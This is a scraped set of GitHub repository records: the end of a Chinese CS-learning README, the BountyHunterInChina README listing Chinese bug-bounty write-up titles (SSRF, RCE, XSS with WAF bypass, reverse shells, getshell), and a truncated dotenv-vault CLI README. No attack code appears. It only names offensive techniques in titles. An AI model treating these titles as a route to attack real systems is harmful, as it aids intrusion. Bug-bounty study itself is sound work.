Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain?ref=badge_shield) [![Timeline graph](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_timeline.svg)](https://github.com/cubxxw/Block_Chain/commits) [![Issue status graph](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_issues.svg)](https://github.com/cubxxw/Block_Chain/issues) [![Pull request status graph](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_prs.svg)](https://github.com/cubxxw/Block_Chain/pulls) ![Trending topics](https://images.repography.com/26892425/3293172751/Block_Chain/recent-activity/04864df8cf8f1f104b2b9453e0b47498_words.svg) <br> ## ๐Ÿ’ก ็‰ˆๆƒๅฃฐๆ˜Ž &copy; [![GitHub license](https://sm.nsddd.top//typora/cs-awesome-Block_Chain?mail:3293172751@qq.com)](http://zh.wikipedia.org/wiki/Wikipedia:CC-by-sa-3.0ๅ่ฎฎๆ–‡ๆœฌ) ***License**:* ๆœฌไนฆๆ‰€ๆœ‰ๅ†…ๅฎน้ตๅพช[CC-BY-SA 
3.0ๅ่ฎฎ๏ผˆ็ฝฒๅ-็›ธๅŒๆ–นๅผๅ…ฑไบซ๏ผ‰&copy;](http://zh.wikipedia.org/wiki/Wikipedia:CC-by-sa-3.0ๅ่ฎฎๆ–‡ๆœฌ) [![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain.svg?type=large)](https://app.fossa.com/projects/git%2Bgithub.com%2F3293172751%2Fcs-awesome-Block_Chain?ref=badge_large) </br>
๐Ÿ“š ่œ้ธŸๆˆ้•ฟๆ‰‹ๅ†Œ๐Ÿš€ CS็ณปๅˆ— ใ€ไบ‘ๅŽŸ็”Ÿ็ณปๅˆ—ใ€ๅŒบๅ—้“พ็ณปๅˆ—ใ€web3็ณปๅˆ—๐Ÿ”ฅใ€Golang็ณปๅˆ—๐Ÿ’ก......
go,blockchain,docker,fabric,git,mysql,linux,web,awesome,kubernetes
1
7
36
495
4
18
7
J0o1ey/BountyHunterInChina
# BountyHunterInChina๏ผˆ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ๏ผ‰ ## ๆ–‡็ซ ๅˆ—่กจ | ๆ–‡็ซ ๅ | ไฝœ่€… | | :----------------------------------------------------------- | ------- | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไธ€)-่ฝปๆพGETๆŸsrc soapๆณจๅ…ฅ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไบŒ)-้€†ๅ‘app็ ด่งฃๆ•ฐๆฎๅŒ…signๅ€ผๅฎž็Žฐไปปๆ„ๆ•ฐๆฎ้‡ๆ”พๆทปๅŠ  | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไธ‰)-ๆ— ่„‘ๆŒ–ๆŽ˜ๆŸSRC Getshell | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ››)-่ฎฐไธ€ๆฌกๆœ‰่ถฃ็š„ๅฎขๆˆท็ซฏRCEใ€ๆœๅŠก็ซฏXXEๆŒ–ๆŽ˜ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไบ”)-ๅคšๆ‰‹ๆณ•็ป•่ฟ‡WAFๆŒ–ๆŽ˜ๆŸ็ŸฅๅๅŽ‚ๅ•†XSS | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ…ญ)-ๅผบ่กŒๅคšๆฌกFUZZๅ‘็ŽฐๆŸๅŽ‚ๅ•†SSRFๅˆฐredisๅฏ†็ ๅ–ทๆด’ๆ‰น้‡ๅๅผนShell | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไธƒ)-็œ‹ๆˆ‘ๅฆ‚ไฝ•ไปŽFUZZๅˆฐXSSๅœจSRCๅฎ˜็ฝ‘ๅท่ตฐไฝ ็š„ไธชไบบไฟกๆฏ | RG | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ…ซ)-่ฎฐไธ€ๆฌก็งป่ŠฑๆŽฅๆœจ็š„GetShell | RG | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ไน)-ไปŽๆœฌๆ— ๆณ•่งฆๅ‘็š„xssๅˆฐๆขฆๅนป่”ๅŠจๆŒ–ๆŽ˜ๅคšไธช่‡ดๅ‘ฝๆŽฅๅฃไธ‹็š„XSS่งฆๅ‘็‚น | h0af3ng | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅ)-ๆŸๅคงๅŽ‚ไปŽๅบŸๅผƒsso็™ป้™†ๅฃๅˆฐๅคšๆ€่ทฏfuzz่Žทๅ–ๅ„ๅœฐ้ซ˜็ฎกไฟกๆฏ | Cat | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไธ€)-ๆŸSRCๅ‚จๅญ˜XSSๅคšๆฌกBypassWAFๆŒ–ๆŽ˜ | h0af3ng | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไบŒ)-่ฎฐไธ€ๆฌกๅฏนๆŠ—้ฃžๅก”ๆต้‡ๆฃ€ๆต‹็š„ๆ–‡ไปถไธŠไผ  | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไธ‰)-ๆขฆไธญ็ปๆ€ๆŸ่„–ไปฃ็†ๅ•†ๅŽๅฐ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅๅ››)-ๅทง็”จ็›ฎๆ ‡ๅŸŸๅ็‰น็‚นๆŒ–ๆŽ˜ๆŸๆ–ฐไธŠSRCๅ››ๅค„RCE | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(ๅไบ”)-ไปŽๅฟฝ็•ฅๅˆฐtriage็š„SSRFๆŒ–ๆŽ˜ไน‹ๆ—… | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจไธๅˆฐๅฃๅญ(ๅๅ…ญ)-่ฎฐไธ€ๆฌกๆœ€็ปˆ่ขซๅฟฝ็•ฅ็š„graphqlๆผๆดžๆŒ–ๆŽ˜็ปๅŽ† | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(็•ชๅค–็ฏ‡โ‘ )-ๆต…่ฎฐไธ€ๆฌกๅฑ‚ๅฑ‚็ช็ ด็š„ๆ”ป้˜ฒๆผ”็ปƒ | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ(็•ชๅค–็ฏ‡โ‘ก) - ๆŸๅคด้ƒจ็›ด่พ–ๅธ‚ๆ”ป้˜ฒๆผ”็ปƒ็บชๅฎž-ๅฆ‚ไฝ•ไธ็”จ0dayๆ‰“ไธ‹nไธช็‚น | J0o1ey | | ้‡็”Ÿไน‹ๆˆ‘ๆ˜ฏ่ต้‡‘็ŒŽไบบๅˆ่ฎขๆœฌ(2023ๅนด4ๆœˆๅ‰็š„ๅˆ้›†) | J0o1ey | | ๆœชๅฎŒๅพ…็ปญ | | | ๆฌข่ฟŽๆŠ•็จฟ | | ### ้กน็›ฎไบคๆต็พค/ๅนฟๅ‘Š **ๅบ”ๅคงๅฎถ่ฆๆฑ‚๏ผŒๅผ€ไธ€ไธช้กน็›ฎไบคๆต็พค๏ผŒไบบๆปกๆˆ–่€…ไบŒ็ปด็ ่ฟ‡ๆœŸๅฏ่”็ณป็ฌ”่€…Vxๆ‹‰ๆ‚จๅ…ฅ็พค๏ผˆๆฌข่ฟŽๅคงๅฎถ่ฎจ่ฎบๅ‰ๆฒฟ็š„ๆผๆดžๆŒ–ๆŽ˜/ๆ”ป้˜ฒcase๏ผŒๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ็š„็”Ÿๆดปไฝ“ๆ‚Ÿ** **ไนŸๆฌข่ฟŽๅคงๅฎถๅ’Œ็ฌ”่€…่ฟ›่กŒๆŠ€ๆœฏไบคๆตไธŽๆŽข่ฎจ๏ผˆๅธŒๆœ›ๆˆ‘ไปฌๅฏไปฅไปŽไบคๆต่ฟ‡็จ‹ไธญ้ƒฝๆœ‰ๆ”ถ่Žท๏ผŒ่€Œไธๆ˜ฏไธ€ๆ–นๅฝ“ไผธๆ‰‹ๅ…š๏ผ‰** **ไธบไบ†่กฅ่ดดๅŒ—ๆผ‚ๆœŸ้—ดๅฎถ็”จ๏ผŒๅฆ‚ๆžœๅคงๅฎถๅฏน็ฌ”่€…็š„<ๅ…จๆ ˆๅผ้ป‘็™ฝ็›’ๆผๆดžๆŒ–ๆŽ˜/ๆ”ป้˜ฒๅŸน่ฎญ>็ญ‰ไธšๅŠกๆ„Ÿๅ…ด่ถฃ๏ผŒๆˆ–ๆœ‰ๅ…ถไป–ๅˆ่ง„็š„้กน็›ฎ้œ€ๆฑ‚๏ผŒไนŸๆฌข่ฟŽ็งไฟก็ฌ”่€…๏ผŒๆ„Ÿ่ฐขๅคงๅฎถๅฏน็ฌ”่€…็”Ÿๆดปไธๆ˜“็š„็†่งฃ** ![้กน็›ฎๅ›พmin](https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202402021520821.jpg) ## Update History ### 2024ๅนด2ๆœˆ ๆ›ดๆ–ฐ ็ช็„ถๅ‘็Žฐๅทฒ็ปๆœ‰ๅฐ†่ฟ‘ไธ€ๅนดๆฒกๆœ‰ๆ›ดๆ–ฐไบ†๏ผŒ่ฟ™ไธ€ๅนด็ฌ”่€…ๅšๆ”ป้˜ฒ/Pentest็ฑป็š„ๅทฅไฝœๅทฒ็ปไธๆ˜ฏๅพˆๅคšไบ†๏ผŒๆ›ดๅคš็š„ๆ—ถ้—ดๆŠ•ๅ…ฅๅˆฐไบ†ไผไธšๅฎ‰ๅ…จๅปบ่ฎพ็š„ๅญฆไน ใ€ๆ€่€ƒไธŽๅฎž่ทตไธญ๏ผŒๅ› ๆญคไนŸๆฒกๅ•ฅไผ˜่ดจ็š„ๅ†…ๅฎนๅฏไปฅๆ›ดๆ–ฐ๏ผŒๆ›ดๆ–ฐ็ผ“ๆ…ข๏ผŒ่ฟ˜ๆœ›ๅคงๅฎถ่ง่ฐ… **็ป“ๅˆ่ฟ‘ไธ€ๅนดๅฎ‰ๅ…จ่กŒไธš็š„ๆƒจๆทกๅคงๅฝขๅŠฟๅ’Œ็ฌ”่€…ๅŒ—ๆผ‚็š„ๅˆ‡่บซไฝ“้ชŒ๏ผŒ2024.2.1 ๆœฌ้กน็›ฎๅ†ณๅฎšๆ›ดๅไธบโ€œ้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญโ€** **ไปฅๆ›ดๅŠ ๅˆ‡ๅˆๅฎž้™…็š„็”Ÿๅญ˜็Žฐ็Šถไธบๆ ‡้ข˜๏ผŒๆ็ป˜ไธ€็‚นๆœ‰ๆ„ๆ€็š„ๆŠ€ๆœฏcase๏ผŒ่ฟ™ไพฟๆ˜ฏๆ”นๅ็š„ๅˆ่กท** ### 2023ๅนด4ๆœˆ ๆ›ดๆ–ฐ 
็ปๅŽ†ไบ†ๅŽปๅนดไธ€ๅนด็–ซๆƒ…ๅคง่ƒŒๆ™ฏไธ‹็š„ไบ’่”็ฝ‘ๅฏ’ๅ†ฌ๏ผŒๅนดๅˆๆ—ถ่Š‚๏ผŒ็ปˆไบŽ็ญ‰ๅˆฐไบ†ๆ˜ฅๅ›žๅคงๅœฐ๏ผŒ็–ซๆƒ…ๆ—ถไปฃ็š„ๅŸบๆœฌ็ป“ๆŸใ€‚ไฝ†ๆ˜ฏๅพˆ้—ๆ†พ๏ผŒ็ปๅŽ†ไบ†ๅŽปๅนด็š„ไบๆŸๅŽ๏ผŒ็ฌ”่€…็š„ๅฐๅพฎไผไธšๅทฒ็ป็†ฌไธ่ฟ‡ไปŠๅนดๅนดไธญไบ†๏ผŒไฝœไธบไธ€ไธช20ๆฅๅฒ็š„ๅˆ›ไธš่€…ๅ‡†ๅค‡็”ณ่ฏท่‚กๆƒ่ฝฌ่ฎฉไบ†๏ผŒ้ข‡ๆœ‰ไบ›ๆ„Ÿๆ…จใ€‚่‡ชๅทฑๅฟ™้‡Œๅฟ™ๅค–๏ผŒ็ปˆ็ฉถ่ฟ˜ๆ˜ฏ่ฆ่€่€ๅฎžๅฎžๅœฐๆ”พไธ‹้‚ฃไบ›ไธๅˆ‡ๅฎž้™…็š„ๆƒณๆณ•๏ผŒๆŽฅๅ—็Žฐๅฎžๅ’Œๅธ‚ๅœบ็š„ๆฎ‹้…ทใ€‚ ๅšๅ…ฌๅธๅ’ŒไธšๅŠก็š„่ฟ™ไธคๅนด๏ผŒ็ฌ”่€…็ปๅŽ†ไบ†ๅพˆๅคš๏ผŒ้™คๅŽปๅฐ‘้ƒจๅˆ†ๆˆๅ•็š„็ปฝๆ”พๆ—ถๅˆป๏ผŒๅคง้ƒจๅˆ†ๆ—ถๅ€™ๅคš็š„่ฟ˜ๆ˜ฏ่ขซไบบๅฟƒๅ’Œไบบๆ€งๆ‰“็š„้ผป้’่„ธ่‚ฟ็š„ๆ„Ÿๆ‚Ÿใ€‚ๆ—ถๆ—ถๅˆปๅˆป่€ƒ่™‘ไผไธš่ƒฝๅฆๆดป่ฟ‡ไธ‹ไธ€ไธชๅญฃๅบฆ๏ผŒ่ฟ™่ฎฉไธ€ไธช20ๆฅๅฒ็š„ๅนด่ฝปไบบ่บซๅฟƒไฟฑ็–ฒ๏ผŒๆ„Ÿๅˆฐ่ฟทๆƒ˜ใ€ไธๅฎ‰ๅ’Œๆตฎ่บ๏ผŒ่ฟทๅคฑไบ†ๅพˆๅคš็š„ๅˆๅฟƒไธŽ็ƒญ็ˆฑใ€‚ๆ‰€ไปฅๆˆ‘้€‰ๆ‹ฉ็ป™่ถณ่‡ชๅทฑๆฒ‰ๆท€็š„ๆ—ถ้—ด๏ผŒๅฏป่ง…ๆœฌๅฟƒ๏ผŒ่€Œไธๆ˜ฏๅœจๅนด่ฝปๅˆฐไธ่ƒฝๅ†ๅนด่ฝป็š„ๅฒๆœˆ้‡Œๆ€ฅไบŽๆฑ‚ๆˆใ€‚ ๅฆ‚ไปŠๅ›ž้ฆ–็œ‹ๆฅ๏ผŒๅฏ่ƒฝๅŒๆ—ถๅšๆŠ€ๆœฏๅ’Œๅ•†ไธš็š„ไบบ๏ผŒๅฟƒไธญๆœ€็บฏ็ฒน็š„ไธœ่ฅฟๅฏ่ƒฝไนŸๅชๅ‰ฉไธ‹ๆŠ€ๆœฏไบ†ใ€‚็ฌ”่€…ๅฐๆ—ถๅ€™่ขซ้ป‘ๅฎข็š„ๆ•…ไบ‹ๅธๅผ•๏ผŒไปŽๅฐๅˆฐๅคง๏ผŒไธ€ไธๅฐๅฟƒๅšๆŒๅญฆไน ๅฎ‰ๅ…จๅทฒ็ปๅฅฝไบ›ๅนดไบ†๏ผŒๅ—ๆ™บๅ•†ๅ’Œๅคฉ่ต‹ๆ‰€้™๏ผŒ่‡ชๅทฑๅญฆไบ†ๆŒบไน…ไพ็„ถๆ˜ฏ่œ้ธกๆฐดๅนณใ€‚ๅœจๅญฆๅฎ‰ๅ…จ็š„่ฟ™ไบ›ๅนด่ขซๆœ‹ๅ‹ไปฌ้—ฎๅˆฐๆœ€ๅคš็š„ไธ€ไธช้—ฎ้ข˜ๅฐฑๆ˜ฏโ€”โ€”โ€œๆˆ‘ๅญฆไบ†owasp top10ๆผๆดžๅŸบ็ก€ๅŽ๏ผŒๅฆ‚ไฝ•ๆœ‰ๆ•ˆๅœฐๆŒ–ๆŽ˜ๆผๆดžโ€๏ผŒๆฏๆฌก่ขซ้—ฎๅˆฐ่ฟ™็ง้—ฎ้ข˜๏ผŒๆˆ‘่ฏ็ฉท็š„ๅ›ž็ญ”้ƒฝๆ˜ฏโ€œ่กฅ่ถณๅŸบ็ก€๏ผŒ่กฅ่ถณๅŸบ็ก€๏ผŒ่กฅ่ถณๅŸบ็ก€โ€ใ€‚ ๅœจ็ฌ”่€…ไป…ๆœ‰็š„ไธ€็‚น็Ÿฅ่ฏ†ๅ‚จๅค‡้‡Œไธญ๏ผŒ็ฌ”่€…ไธ€็›ดๅšไฟก๏ผŒๅœจๆ— ่ฎบๅœจๆ”ป่ฟ˜ๆ˜ฏ้˜ฒ๏ผŒๅช่ฆๆ‹ฟๆๅฅฝๅผ€ๅ‘็š„็‰นๆ€ง๏ผŒ่ฟ็ปด็š„ไน ๆ€ง๏ผŒไบบ็ฑป็š„ๆœฌๆ€งโ€”โ€”ๅฐฑ่ƒฝๆ— ๅพ€ไธๅˆฉ ๅ› ๆญค็ฌ”่€…ๅฐ†่ฟ™ไธ€ไธคๅนด็š„ๆ–‡็ซ ๆ”ถๅฝ•่ตทๆฅๅšๆˆๅˆ่ฎขๆœฌ๏ผŒๅ…ฑ12ๅฐ่Š‚๏ผŒ12890ๅญ—๏ผŒๅธŒๆœ›ๅคšๅฐ‘่ƒฝ็ป™ๅคงๅฎถ็œ‹ๅˆฐไธ€ไบ›ๆœ‰่ถฃ็š„ๅฎ‰ๅ…จ้—ฎ้ข˜ใ€‚ๆ–‡็ซ ไธญ็š„ๅ›พ้ƒฝๆ˜ฏP็š„๏ผŒไธๆถ‰ๅŠไปปไฝ•โ€œๅฎž้™…ๆผๆดžโ€ๅซไน‰ใ€‚็ฌ”่€…ๆƒณ่ฏด๏ผŒๅœจ่ฟ™ไธช็Ÿฅ่ฏ†ไป˜่ดน๏ผŒๆŠ€ๆœฏไบบๅ‘˜็ผบ้’ฑ่ฐ‹็”Ÿๅญ˜๏ผŒๅฐๅพฎไผไธš็š„ๅ‘ๅฑ•ไธพๆญฅ็ปด่‰ฐๆ—ถไปฃ้‡Œ๏ผŒๅšๆŒๅšๅ…่ดน็š„ๅˆ†ไบซๅฎžๅฑžไธๆ˜“ใ€‚่กฃ้ฃŸ่ถณ่€Œ็Ÿฅ่ฃ่พฑ๏ผŒไป“ๅปชๅฎž่€Œ็Ÿฅ็คผ่Š‚๏ผŒๅพˆ้—ๆ†พ๏ผŒ็ฌ”่€…ๆ˜ฏไธชไธบๅฝฉ็คผๅ‘ๆ„๏ผŒๆˆฟๅญไนŸไนฐไธ่ตท็š„็ฉท้ฌผ๏ผŒ็Ÿญๆ—ถๆœŸๅ†…ไนŸๆ— ๆณ•็ปง็ปญๆ›ดๆ–ฐไบ†๏ผŒ่ฆ็œๅ‡บๆ—ถ้—ดๅ’Œ็”Ÿๆดปๅฏน็บฟไบ†๏ผŒๅธŒๆœ›ๅ„ไฝ็†่งฃใ€‚ ๅธŒๆœ›ๅœจๅฐ†ๆฅ็š„ๆŸไธ€ๅคฉ๏ผŒๆˆ‘ไปฌๅœจไธ‹ไธ€ๅœบๅฑฑๆตท็›ธ้‡ใ€‚ ## Q&A 1.ๅŒๆ—ถๅ…ณไบŽๆผๆดž้ป‘็™ฝ็›’ๆŒ–ๆŽ˜๏ผŒๅพˆๅคšไบบๅ’จ่ฏข็ฌ”่€…โ€”โ€”โ€œ่‡ชๅทฑๆฒกๆ€่ทฏๆ€ŽไนˆๅŠž?โ€ **้’ˆๅฏน่ฟ™ไธช้—ฎ้ข˜๏ผŒ็ฌ”่€…ๆƒณ่ฏด๏ผŒไธ่ฆๆŠŠๆผๆดžๆŒ–ๆŽ˜็š„ๅธŒๆœ›ๅฏ„ๆ‰˜ไบŽโ€œๅ–ๅทงโ€๏ผŒ็Žฐๅœจ็š„ๆผๆดžไบงๅ‡บ็Žฏๅขƒๆ—ฉๅทฒไธๆ˜ฏไปฅๅ‰้‚ฃไธช่„šๆœฌๅฐๅญ้ƒฝ่ƒฝๆ—ฅๅคฉไธ‹็š„ๅนดไปฃไบ†ใ€‚** **ๆ˜Žๆ™บไน‹้€‰ๆ˜ฏ่€่€ๅฎžๅฎžๆŠŠๅผ€ๅ‘ๅ’Œๅฎ‰ๅ…จ็Ÿฅ่ฏ†็š„ๅŸบ็ก€ๆ‰“็‰ข๏ผŒๅŸบ็ก€ๅคŸๅŽšๅฎž๏ผŒๆ€่ทฏไธŽ็ตๆ„Ÿๅชๆ˜ฏ้™„ๅฑžๅ“๏ผŒๅŽš็งฏๆ‰่ƒฝ่–„ๅ‘** ## ้กน็›ฎStar่ถ‹ๅŠฟ [![Stargazers](https://starchart.cc/J0o1ey/BountyHunterInChina.svg)](https://starchart.cc/J0o1ey/BountyHunterInChina.svg)
้‡็”Ÿไน‹ๆˆ‘ๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ็ณปๅˆ—๏ผŒๅˆ†ไบซๅœจๅฎ‰ๅ…จ่กŒไธš่ฎจๅฃๅญ่ฟ‡็จ‹ไธญ๏ผŒSRCใ€้กน็›ฎๅฎžๆˆ˜็š„ๆœ‰่ถฃๆกˆไพ‹
null
0
1
0
55
0
1
0
dotenv-org/dotenv-vault
![dotenv.org](https://dotenv.org/banner.png) `dotenv-vault` is a cli to *sync .env files across machines, environments, and team members*. [![NPM Version](https://img.shields.io/npm/v/dotenv-vault.svg?style=flat-square)](https://npmjs.org/package/dotenv-vault) ## ๐ŸŒฑ Install It works with a single command. Run `npx dotenv-vault@latest push`. ```sh npx dotenv-vault@latest push ``` ``` remote: Securely pushing (.env)... done remote: Securely pushed development (.env) remote: Securely built vault (.env.vault) ``` That's it. You securely synced your `.env` file. Next, tell your teammate to run `npx dotenv-vault@latest pull` ```sh npx dotenv-vault@latest pull ``` Nice! See further [usage](#%EF%B8%8F-usage) and [commands](#-commands). --- #### Other Ways to Install Don't want to use [npx](https://docs.npmjs.com/cli/v7/commands/npx)? Install a number of other ways. <p><img alt="apple icon" src="https://api.iconify.design/mdi/apple.svg" width="20" /> Install via <a href="https://github.com/dotenv-org/homebrew-brew">Homebrew</a></p> ```bash $ brew install dotenv-org/brew/dotenv-vault $ dotenv-vault help ``` <p><img alt="windows icon" src="https://api.iconify.design/mdi/windows.svg" width="20" /> Install on <a href="https://dotenv-vault-assets.dotenv.org">Windows</a></p> * [32-bit installer](https://dotenv-vault-assets.dotenv.org/channels/stable/dotenv-vault-x86.exe) * [64-bit installer](https://dotenv-vault-assets.dotenv.org/channels/stable/dotenv-vault-x64.exe) <p><img alt="docker icon" src="https://api.iconify.design/mdi/docker.svg" width="20" /> Install and run commands via <a href="https://hub.docker.com/r/dotenv/dotenv-vault">Docker</a></p> ```bash $ docker run -w $(pwd) -v $(pwd):$(pwd) -it dotenv/dotenv-vault help ``` <a href="https://www.dotenv.org/install/">Learn more about installation</a> ## ๐Ÿ—๏ธ Usage When you make a change to your `.env` file, push it up. ```bash $ npx dotenv-vault@latest push ``` Commit your `.env.vault` file safely to code. ```bash $ git add .env.vault $ git commit -am "Add .env.vault" $ git push ``` Now your teammate can pull the latest `.env` changes. ```bash $ git pull $ npx dotenv-vault@latest pull ``` That's it! <a href="https://www.dotenv.org/docs/quickstart?r=1">Learn more about usage</a> ## ๐Ÿš€ Deploying Stop scattering your production secrets across multiple third-parties and tools. Instead, use an encrypted `.env.vault` file. Generate your encrypted `.env.vault` file. ```bash $ npx dotenv-vault@latest build ``` Fetch your production `DOTENV_KEY`. ```bash $ npx dotenv-vault@latest keys production remote: Listing .env.vault decryption keys... done dotenv://:key_1234โ€ฆ@dotenv.org/vault/.env.vault?environment=production ``` Set `DOTENV_KEY` on your server. ```bash # heroku example heroku config:set DOTENV_KEY=dotenv://:key_1234โ€ฆ@dotenv.org/vault/.env.vault?environment=production ``` Commit your `.env.vault` file safely to code and deploy. ```bash $ git add .env.vault $ git commit -am "Update .env.vault" $ git push $ git push heroku main # heroku example ``` That's it! On deploy, your `.env.vault` file will be decrypted and its secrets injected as environment variables โ€“ just in time. <a href="https://www.dotenv.org/docs/quickstart?r=1">Learn more about deploying</a> ## ๐ŸŒด Manage Multiple Environments After you've pushed your `.env` file, dotenv-vault automatically sets up multiple environments. Manage multiple environments with the included UI. [learn more](/docs/tutorials/environments) ``` $ npx dotenv-vault@latest open production ``` That's it! 
Manage your ci, staging, and production secrets from there. Would you also like to pull your production `.env` to your machine? Run the command: ``` $ npx dotenv-vault@latest pull production ``` โ„น๏ธ **๐Ÿ” Vault Managed vs ๐Ÿ’ป Locally Managed**: The above example, for brevity's sake, used the ๐Ÿ” Vault Managed solution to manage your `.env.vault` file. You can instead use the ๐Ÿ’ป Locally Managed solution. [See the faq further below](#how-do-i-use--locally-managed-dotenv-vault). Our vision is that other platforms and orchestration tools adopt the `.env.vault` standard as they did the `.env` standard. We don't expect to be the only ones providing tooling to manage and generate `.env.vault` files. <a href="https://www.dotenv.org/docs/tutorials/environments?r=1">Learn more about environments</a> ## ๐Ÿ“š Examples <table> <tbody> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/vercel"> <img src="https://api.iconify.design/devicon/vercel.svg" alt="Vercel", width="20" /> Vercel </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/heroku"> <img src="https://api.iconify.design/skill-icons/heroku.svg" alt="Heroku", width="20" /> Heroku </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/cis/github-actions"> <img src="https://api.iconify.design/devicon/github.svg" alt="GitHub", width="20" /> GitHub Actions </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/gitlab-ci"> <img src="https://api.iconify.design/devicon/gitlab.svg" alt="GitLab", width="20" /> GitLab CI/CD </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/netlify"> <img src="https://api.iconify.design/skill-icons/netlify-light.svg" alt="Netlify", width="20" /> Netlify </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/docker"> <img src="https://api.iconify.design/skill-icons/docker.svg" alt="Docker", width="20" /> Docker </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/express/docker-compose"> <img src="https://api.iconify.design/skill-icons/docker.svg" alt="Docker Compose", width="20" /> Docker Compose </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/cis/circleci"> <img src="https://api.iconify.design/logos/circleci.svg" alt="CircleCI", width="20" /> CircleCI </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/serverless/aws-lambda"> <img src="https://api.iconify.design/logos/serverless.svg" alt="Serverless", width="20" /> Serverless </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/railway"> <img src="https://api.iconify.design/simple-icons/railway.svg" alt="Railway", width="20" /> Railway </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/render"> <img src="https://api.iconify.design/simple-icons/render.svg" alt="Render", width="20" /> Render </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/travis-ci"> <img src="https://api.iconify.design/simple-icons/travisci.svg" alt="Travis CI", width="20" /> Travis CI </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/cis/google-cloud-build"> <img src="https://api.iconify.design/devicon/googlecloud.svg" alt="Google Cloud", width="20" /> 
Google Cloud </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/platforms/fly"> <img src="https://api.iconify.design/logos/fly-icon.svg" alt="Fly.io", width="20" /> Fly.io </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/addons/slack"> <img src="https://api.iconify.design/devicon/slack.svg" alt="dotenv-vault + Slack", width="20" /> Slack </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/buddy"> <img src="https://api.iconify.design/logos/buddy.svg" alt="Buddy", width="20" /> Buddy </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/cloud66"> <img src="https://api.iconify.design/simple-icons/cloud66.svg" alt="Cloud66", width="20" /> Cloud66 </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/digital-ocean"> <img src="https://api.iconify.design/devicon/digitalocean.svg" alt="Digital Ocean", width="20" /> Digital Ocean </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/dagger"> <img src="https://dagger.io/img/logo-alt-2.svg" alt="Dagger", width="20" /> Dagger 